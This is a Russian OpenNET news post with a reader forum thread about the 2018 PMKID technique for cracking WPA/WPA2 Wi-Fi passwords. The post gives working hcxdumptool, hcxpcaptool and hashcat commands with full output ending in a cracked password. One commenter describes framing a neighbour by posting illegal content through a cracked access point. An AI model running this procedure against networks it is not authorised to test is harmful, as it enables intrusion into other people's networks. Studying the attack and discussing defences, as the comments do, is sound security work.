The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"Новая техника атаки на беспроводные сети с WPA2"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от opennews (??), 12-Авг-18, 13:18 
Йенс Штойбе (Jens "atom" Steube), создатель программы для подбора паролей hashcat (https://hashcat.net), представил (https://hashcat.net/forum/thread-7717.html) новую технику атаки на беспроводные сети с аутентификацией на базе механизмов WPA или WPA2. Предложенный метод существенно упрощает получение идентификатора, который затем может быть использован для подбора пароля подключения к беспроводной сети.


Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE  (Robust Security Network Information Element)). Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key),  передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. В частности, PMKID вычисляется по формуле "HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)". Так как  MAC-адреса и строка с названием сети изначально известны, не составляет труда применять PMKID вместо PMK в качестве признака успешного подбора пароля.


Атаки по подбору паролей на основе перехваченных кадров не новы, но в отличие от ранее применяемых (https://www.opennet.ru/tips/3025_wpa_wpa2_wifi_aircrackng_ha...) методов новая атака не требует ожидания подключения к сети нового пользователя и сохранения всей активности, связанной с установкой им соединения. Для получения данных, достаточных для начала подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить в любое время, отправив запрос аутентификации к точке доступа. Подобная особенность существенно  упрощает получение данных для начала подбора, но в целом успешность атаки как и раньше зависит от стойкости установленного пароля к подбору по словарю.


Отмечается, что большинство пользователей не утруждают себя установкой стойких к подбору паролей подключения к беспроводной сети или используют генерируемые точкой доступа пароли, которые на первый взгляд являются стойкими, но на деле формируются на основе предсказуемых шаблонов. Подобные пароли достаточно эффективно подбираются при знании информации о производителе точки доступа, которую можно получить, например, проанализировав MAC-адрес и ESSID. Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.


Для проведения атаки требуются свежие версии hcxdumptool (https://github.com/ZerBea/hcxdumptool), hcxtools (https://github.com/ZerBea/hcxtools) и hashcat (https://github.com/hashcat/hashcat).


Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID и сохраняем результат в файл в формате pcapng

   ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp39s0f3u4u5
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: 89acf0e761f4 (client)
    MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
    EAPOL TIMEOUT............: 20000
    DEAUTHENTICATIONINTERVALL: 10 beacons
    GIVE UP DEAUTHENTICATIONS: 20 tries
    REPLAYCOUNTER............: 62083
    ....
    [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e  [ASSOCIATIONREQUEST, SEQUENCE 4]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]


В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется запускать hcxdumptool в течение приблизительно 10 минут.


Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из формата pcapng в формат для разбора в hashcat.

   ./hcxpcaptool -z test.16800 test.pcapng

    start reading from test.pcapng

    summary:
    --------
    file name....................: test.pcapng
    file type....................: pcapng 1.0
    file hardware information....: x86_64
    file os information..........: Linux 4.17.11-arch1
    file application information.: hcxdumptool 4.2.0
    network type.................: DLT_IEEE802_11_RADIO (127)
    endianess....................: little endian
    read errors..................: flawless
    packets inside...............: 66
    skipped packets..............: 0
    packets with FCS.............: 0
    beacons (with ESSID inside)..: 17
    probe requests...............: 1
    probe responses..............: 11
    association requests.........: 5
    association responses........: 5
    authentications (OPEN SYSTEM): 13
    authentications (BROADCOM)...: 1
    EAPOL packets................: 14
    EAPOL PMKIDs.................: 1

    1 PMKID(s) written to test.16800

Содержимое записанного файла включает строки вида
"2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a", которые содержат шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID.


Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике:

   ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng


Запускаем hashcat для подбора пароля (применяется режим 16800):

   ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

    hashcat (v4.2.0) starting...

    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

    Applicable optimizers:
    * Zero-Byte
    * Single-Hash
    * Single-Salt
    * Brute-Force
    * Slow-Hash-SIMD-LOOP

    Minimum password length supported by kernel: 8
    Maximum password length supported by kernel: 63

    Watchdog: Temperature abort trigger set to 90c

    2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
    Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs)
    Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs)
    Guess.Mask.......: ?l?l?l?l?l?lt! [8]
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#*.....:  1641.3 kH/s
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 66846720/308915776 (21.64%)
    Rejected.........: 0/66846720 (0.00%)
    Restore.Point....: 0/11881376 (0.00%)
    Candidates.#1....: hariert! -> hhzkzet!
    Candidates.#2....: hdtivst! -> hzxkbnt!
    Candidates.#3....: gnxpwet! -> gwqivst!
    Candidates.#4....: gxhcddt! -> grjmrut!
    HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
    HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
    HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
    HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

URL: https://medium.com/@billbuchanan_27654/the-beginning-of...
Новость: https://www.opennet.ru/opennews/art.shtml?num=49120

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Новая техника атаки на беспроводные сети с WPA2"  –4 +/
Сообщение от Аноним (1), 12-Авг-18, 13:18 
боюсь денег потраченных на 4х GeForce GTX 1080 хватит на оплату интернета на 15 лет как минимум. если вы поняли о чем я :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Новая техника атаки на беспроводные сети с WPA2"  –1 +/
Сообщение от Аноним (2), 12-Авг-18, 13:27 
Да глючная точка доступа явно дешевле, чем 4•1080
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

4. "Новая техника атаки на беспроводные сети с WPA2"  +14 +/
Сообщение от angra (ok), 12-Авг-18, 13:33 
А если атакующий не мамкин хацкер и цель не халявный интернет, а ресурсы внутренней сети фирмы?
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

12. "Новая техника атаки на беспроводные сети с WPA2"  +6 +/
Сообщение от Аноним (12), 12-Авг-18, 14:25 
Это ж какие кретины во внутреннюю сеть с ценными данными по вайфаю пускают ?
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

15. "Новая техника атаки на беспроводные сети с WPA2"  +3 +/
Сообщение от 123 (??), 12-Авг-18, 14:35 
Русский бизнес.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

18. "Новая техника атаки на беспроводные сети с WPA2"  +5 +/
Сообщение от Я (??), 12-Авг-18, 15:03 
Или мамкин админ, который на "аутсорсе" херачит по быстренькой, чтобы бабла словить.

А нерусский бизнес как-то по-другому делает?
Думаю это зависит от серьёзности конторы. Если ты Васген с бутиком тухлей, то взлом точки доступа - не самая страшная потеря для твоего бизнеса. Пожарная инспекция больше на взятки заберёт. И серьёзные люди мудохаться с точкой доступа Васгена четыре дня не будут... Должна ли его волновать дырявость WPA2?

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

17. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (17), 12-Авг-18, 14:45 
Все у кого есть удаленный доступ.
Так как нет способа проверить, вот этот хост с WiFi сидит, или в розетку проводом воткнулся.

Да и доступ только к гостевым WiFi тоже много может рассказать.
Например.
Приходит в организацию, представитель другой организации.
Ценные ли данные у этого представителя?
Ценна ли инфа что эти две организации затевают что-то совместное?

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

19. "Новая техника атаки на беспроводные сети с WPA2"  +2 +/
Сообщение от Crazy Alex (ok), 12-Авг-18, 15:05 
Каждый первый примерно. Каждый второй - уж точно.Ноутбуки, смартфоны у всех.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

29. "Новая техника атаки на беспроводные сети с WPA2"  +13 +/
Сообщение от angra (ok), 12-Авг-18, 18:18 
Верно подмечено. Добавлю еще кучу устройств вроде переносных сканеров штрихкодов.
А вот мамкины хацкеры живут в выдуманном мире, где офис каждой второй фирмы имеет защиту уровня правительственного бункера, а все остальные за серьезные конторы не считаются. Ничего, закончат школу, устроятся на работу и перед ними разверзнуться бездны. Окажется, что "правильно" не делают почти нигде и никогда.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

38. "Новая техника атаки на беспроводные сети с WPA2"  –3 +/
Сообщение от Maxim (??), 12-Авг-18, 23:59 
Подтверждаю

Поэтому у нас 3 сети.
Одна в которой есть доступ ко внутренним ресурсам.
Вторая для сотрудников (интернет онли).
Третья гостевой доступ в интернет.
Пароли случайные символы от 20+ кроме гостевого.

Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

40. "Новая техника атаки на беспроводные сети с WPA2"  +10 +/
Сообщение от Аноним (40), 13-Авг-18, 04:03 
Записанные на бумажке приклеенной к монитору...
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

50. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от _ (??), 13-Авг-18, 10:41 
RADIUS, не не слышал
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

46. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Андрей (??), 13-Авг-18, 08:54 
Я скажу даже больше порой данные не такие уже и ценные! Ну сломаете вы wifi внутренний в пицерии, и что? Узнаете рецепт пиццы который написан в меню?
Или скажем взломаете сеть колбасного комбината и таки бездна откроется перед вами в колбасу кладут бумагу! ААА мы все умрем!!! Незнаю как в России, на Украине по тихоньку все выходят из тени и стараются работать в белую, так что даже шантажировать особо не выйдет. А если контора работает в темную то как правило занесли столько денег, что человек который хочет по шантажировать, по поводу черной бухгалтерии, то человечка закроют быстрее чем проведут проверку на конторе.
Для более мение крупных контор даже атаки шифровальщиков не страшны, зашифровало сервер, развернули бекап за 10 минут виртуалки и погнали дальше.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

57. "Новая техника атаки на беспроводные сети с WPA2"  –1 +/
Сообщение от Аноним (57), 14-Авг-18, 11:46 
А если wifi подключен к системе управления тэц?
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

59. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Андрей (??), 14-Авг-18, 15:52 
И чо? Вы были хоть раз на более-менее крупной тэц?
Много там вайфая подключенного к управлению котлами и турбинами?

Я вот проработал в энергетике 15 лет и знаю. А вы?

Работать надо, а не интернеты читать!

Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

62. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от Аноним (62), 14-Авг-18, 21:41 
> Работать надо, а не интернеты читать!

А вы в таком случае что тут делаете?

Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

63. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (57), 15-Авг-18, 00:07 
А я почему вопрос задал, так просто что-ли?) И давайте не меряться стажем в энергетике - он у меня немного побольше вашего будет.
Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

68. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (-), 20-Авг-18, 20:37 
> сломаете вы wifi внутренний в пицерии, и что? Узнаете рецепт пиццы
> который написан в меню?

Конкуренты с удовольствием заплатят за возможность вешать прямо через внутреннюю систему левые заказы оптом, сведения о планах, бухгалтерии, компромат и все такое. Ничего личного, это бизнес.

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

70. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от SysA (?), 28-Янв-19, 21:39 
A в пиццерии есть POS-терминалы по WiFi! ;)
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

60. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (60), 14-Авг-18, 20:14 
Например, те, чьё начальство арендовало кусок фойе бизнес-центра под стойку ресепшона. Сама фирма занимает одно крыло 3-го этажа, тянуть кабель арендодатель не разрешает, а доступ в корп. сеть девочкам на ресепшоне чтобы сегодня был.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

65. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от это что никнеймы теперь нужны аааа (?), 16-Авг-18, 07:49 
Много кто. В качестве примера можно привести одного известного вендора, в российской штаб-квартире которого вайфай раскинут абсолютно везде, и применяется как основной вариант последней мили для клиентских машин сотрудников.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

16. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Я (??), 12-Авг-18, 14:45 
Наверное, точки доступа компании должны быть изолированы от внутренней сети. Ну, знаете, типа: я подключился к точке доступа, в интернет вижу, а в локальную сеть нет - только таких же оболтусов.
А те точки доступа, что для внутренних сотрудников не должны выплёвывать сигнал на открытую территорию и должны быть доступны только в родных стенах. Силу сигнала то можно отрегулировать.
В общем, вся эта херня со взломами конечно интересна для мамкиных хацкеров, а промышленный взлом с точками доступа к серьёзным конторам, это такая же пустая трата времени, как... пердеть в воду, что ли.

А если вы наивный админ, который будет читать все эти новости про уязвимость WPA2, и прочие тонкости, и пытаться закрыть это на программном уровне - мне вас жаль. Просто не используйте этот канал связи, если он не надёжен - вот простая истина.

Вообще, меня удивляют такие ребята, которые пытаются сделать самый безопасный, самый анонимный мессенджер, браузер, точку доступа...

Есть простая древняя мудрость: Замки от добры людей - злых они не остановят.

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

27. "Новая техника атаки на беспроводные сети с WPA2"  +5 +/
Сообщение от angra (ok), 12-Авг-18, 18:06 
Для начала попробуй объяснить элекромагнитным волнам, что они должны не выходить за какую-то там территорию. Без экранирования по периметру. Потом подумай о том, что серьезные конторы существуют не в вакууме. В офисы и даже на заводы заходят всевозможные посетители, от курьеров, до клиентов. И все они, о ужас, попадают на внутреннюю территорию. А еще, представь себе, индивидуальное здание под офис могут себе позволить далеко не все, большинство же снимает офис в каком-нибудь центре вместе с десятками других контор. Ну и наконец решение об использовании или неиспользовании wi-fi принимает не админ, админ его исполняет.

>Есть простая древняя мудрость: Замки от добры людей - злых они не остановят.

Нет ничего глупее подобных древних "мудростей". Интересно, а дверные замки в своей квартире ты уже убрал?

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

42. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (42), 13-Авг-18, 07:28 
>Замки от добры людей - злых они не остановят.

Гугл - корпорация добра, кстати.

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

45. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от ыы (?), 13-Авг-18, 07:56 
поэтому ее зонды не раздражают, а доставляют наслаждение....
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

14. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (17), 12-Авг-18, 14:27 
Поняли. Ты считаешь, что получение чужой учетки для доступа в сеть, нужно для доступа к общедоступным ресурсам интернет.

Однако сеть это не значит интернет, а чужая учетка это возможность представиться персоной с определенными полномочиями. И т.д.

P.S. "И т.д." - обозначает границы моих знаний.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

49. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от Ivan (??), 13-Авг-18, 10:20 
Зная точку доступа человека, на которого точишь зуб, можно с его точки, где ни будь, анонимно, загрузить картинку (из запрещенных по УК или текст), а потом под собой пожаловаться на нее (только с другого устройства), чтоб нужные люди, обратили на нее внимание и тогда, по идее, хозяину точки, предстоит не приятная беседа (а может и больше), с сотрудниками соответствующих организаций.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "Новая техника атаки на беспроводные сети с WPA2"  +6 +/
Сообщение от Аноним (3), 12-Авг-18, 13:31 
Прям странно видеть, что анонимам нужно объяснять, зачем ви-фи ломают... Уж точно не для того, чтобы в ВКшечке за чужой счёт сидеть.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от Андрейemail (??), 12-Авг-18, 14:15 
у блин, к тупому бедному соседу Васяну приедет пативен из за того,что соседский крутой и богатый хацкер  с 4 Жирафами 1080, взломал Васянов Wi-Fi и с его ip высказал например нашему главстерху кучу гадостей и прочей правды жизни.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

21. "Новая техника атаки на беспроводные сети с WPA2"  +8 +/
Сообщение от Аноним (21), 12-Авг-18, 16:23 
Васян сам за это проголосовал
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

23. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от threescarth (ok), 12-Авг-18, 16:54 
Тут речь о том Васяне, который как раз таки за это и не голосовал
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

52. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от Аноним (52), 13-Авг-18, 20:14 
Ну может и не голосовал, но молчаливо согласился. Суть от этого не меняется. Но идея, документированная IBM как best practice больше десяти лет назад на поверхности: /31 на подключение с одним маршрутом до vpn-сервера. Пароль на точку опционален.
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

69. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от SysA (?), 25-Ноя-18, 12:31 
/31?! Уверен?.. ;)
Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

33. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (33), 12-Авг-18, 19:06 
Мисион импосибл какой оо прям лол
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

5. "Новая техника атаки на беспроводные сети с WPA2"  –2 +/
Сообщение от iPony (?), 12-Авг-18, 13:37 
А в WPA3 не прокатит?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

13. "Новая техника атаки на беспроводные сети с WPA2"  –1 +/
Сообщение от AnonPlus (?), 12-Авг-18, 14:26 
В общем, если раньше надо было запустить пару команд в консоли, чтобы послать deauth подключённому пользователю, то теперь не нужно.

Я правильно понимаю, что это вся разница? Так deauth послать вовсе нетрудно. У кого из домашних пользователей включена защита от деаутентификации, поднимите руки?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

22. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от Аноним (22), 12-Авг-18, 16:25 
802.11w который в том числе защищает от deauth в openwrt есть давно и у меня давно включен.

Тут суть скорее в том что к сети на момент скана никто не должен быть изначально подключен и может не быть активного трафика. На сколько я понял PMKID можно получить без какой либо авторизации просто при попытке подключения к сети.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

64. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от AnonPlus (?), 15-Авг-18, 19:27 
>> в openwrt есть давно

Давайте различать "в openwrt" и "в драйвере". В openwrt есть драйверы, в которых этого нет

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

20. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (20), 12-Авг-18, 15:35 
Как насчёт eap-tls?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

41. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (41), 13-Авг-18, 07:26 
Тоже интересно.

Мимо-шизик с wpa-eap дома.

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

56. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (-), 14-Авг-18, 10:19 
Ты ещё небось и руки моешь перед едой? Точно шизик!
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

24. "Новая техника атаки на беспроводные сети с WPA2"  –3 +/
Сообщение от Аноним (33), 12-Авг-18, 17:25 
Если компания маломальски серьёзная то макии используемых устройств будут в базе(кого подключать а кого нет). И доступы соответственно к ресурсам тоже будут разграничены :-)
Ну и появление нового устройства в арп листе должно заставить охрану начать суетится.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

28. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от angra (ok), 12-Авг-18, 18:11 
Ну да, MAC ведь ну никак нельзя подделать. Это запрещает религия тех, кто доступ раздает по mac адресам. И мне бы хотелось посмотреть на контору в которой охрана мониторит mac адреса и начинает кипишь при появлении нового.
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

31. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от Аноним (33), 12-Авг-18, 18:56 
Заходим в компанию связанную с военкой или другую подобную где участвует гостайна, и начинаем брутить...
Далее нам расскажут про религию смены маков и т.д ;)

Понятно что бутик Армэна это просто супер серьёзная контора ))))

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

37. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (33), 12-Авг-18, 23:33 
А MAC где брать прикажете? Или надо для начала украсть у кого то ноутбук или планшет?
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

39. "Новая техника атаки на беспроводные сети с WPA2"  +4 +/
Сообщение от Аноним (22), 13-Авг-18, 02:33 
Для Wi-Fi сети MAC адрес идёт в пакетах без шифрования в не зависимости от того как защищена сеть. Так что достаточно просто немного послушать трафик тем же airmon-ng для сбора всех адресов клиентов которые подключены к сети. Никакой физический доступ к оборудованию клиентов не нужен.
А если нет поддержки managed frame protection то клиента можно просто выкинуть из сети и занять его место.
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

47. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Evgenyemail (??), 13-Авг-18, 09:20 
Введите команду arp.
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

30. "Новая техника атаки на беспроводные сети с WPA2"  +3 +/
Сообщение от ыы (?), 12-Авг-18, 18:30 
>Ну и появление нового устройства в арп листе должно заставить охрану начать суетится.

Колонка воскресного юмора :)

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

51. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от soarin (ok), 13-Авг-18, 14:55 
> Если компания маломальски серьёзная то макии используемых устройств будут в базе(кого подключать а кого нет)

🛋

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

66. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от А (??), 17-Авг-18, 23:36 
Странный критерий сереьзности компании.

Как раз в серьезной количество станций в wifi сети больше 2-3 десятков, и сопровождать базу их MAC-ов просто неудобно.

А вот EAP нормально приготовленный - это вполне себе признак. При этом, как на wifi разведённый, так и на проводных портах уровня доступа.

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

25. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (25), 12-Авг-18, 17:54 
Вообще-то перевод hcxdumptool wifi устройство должно быть переведено в режим monitor.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

26. "Новая техника атаки на беспроводные сети с WPA2"  –2 +/
Сообщение от Аноним (25), 12-Авг-18, 17:55 
А так норм перепечатка с хабра угу.
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

32. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от Аноним (33), 12-Авг-18, 19:00 
Реально какой лошара будет такое делать?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

34. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от имя (?), 12-Авг-18, 20:23 
ломайте, я даже дам подсказку -- 26 символов.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

44. "Новая техника атаки на беспроводные сети с WPA2"  +2 +/
Сообщение от КО (?), 13-Авг-18, 07:50 
А хеш от него какой длины хранится? А то, если 128 бит, то наверное, в пределах 16 символов есть коллизия, которая покороче ваших 26, а для входа тоже прокатывает. Но Вы про нее не знаете. :)
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

48. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от имя (?), 13-Авг-18, 09:29 
Хороший вопрос. Используется aes ccm и tkip, вроде оба 128 бит?
Однако, 16 символов тоже не мало..
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

35. "Новая техника атаки на беспроводные сети с WPA2"  –1 +/
Сообщение от Аноним (35), 12-Авг-18, 22:57 
М-да... После новости задумался, и от греха подальше поставил на точку whitelist MAC адресов и пароль усложнил.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

43. "Новая техника атаки на беспроводные сети с WPA2"  +1 +/
Сообщение от ыы (?), 13-Авг-18, 07:42 
>М-да... После новости задумался, и от греха подальше

Как в анекдоте -
"
Век живи - век учись, подумал он и переложил серебряный портсигар из кармана брюк в нагрудный...
"

>поставил на точку whitelist MAC адресов и пароль усложнил.

whitelist MAC адресов не является защитой.
усложнение пароля - защита весьма условная...

Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

36. "Новая техника атаки на беспроводные сети с WPA2"  –3 +/
Сообщение от Аноним (36), 12-Авг-18, 23:29 
> Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.

Ну пусть попробует подобрать мой 32х-символьный - удачи, чо.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

53. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (52), 13-Авг-18, 20:16 
Я бы подобрал, спасибо Амазону за аренду GPU по низким ценам. Но у тебя же нет ничего интересного. А даже если и есть, то проще бейсбольной битой по голени и ты сам всё расскажешь.
Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

54. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от др. Аноним (?), 13-Авг-18, 21:46 
>> 32х-символьный
> Я бы подобрал, спасибо Амазону за аренду GPU по низким ценам.
> Но

Но прогуливать математику-комбинаторику не следовало. Тогда бы мог прикинуть, с какой скоростью нужно перебирать 32^32/2 комбинаций, чтобы подобрать за приемлимое время.

> проще бейсбольной битой по голени и ты сам всё расскажешь.

С голой битой против лома? Ох уж эти теоретики …

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

58. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от КО (?), 14-Авг-18, 15:01 
Ну вот еще, зачем так много. Достаточно подобрать любой длины, который будет генерить тот же хеш.
Учитывая, что хеш гораздо короче, там может коллизия с паролем типа "1" будет.
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

67. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от terrs (??), 18-Авг-18, 18:56 
+ SS ^)
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

55. "Новая техника атаки на беспроводные сети с WPA2"  +/
Сообщение от Аноним (55), 14-Авг-18, 09:01 
новость нулевой пользы
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

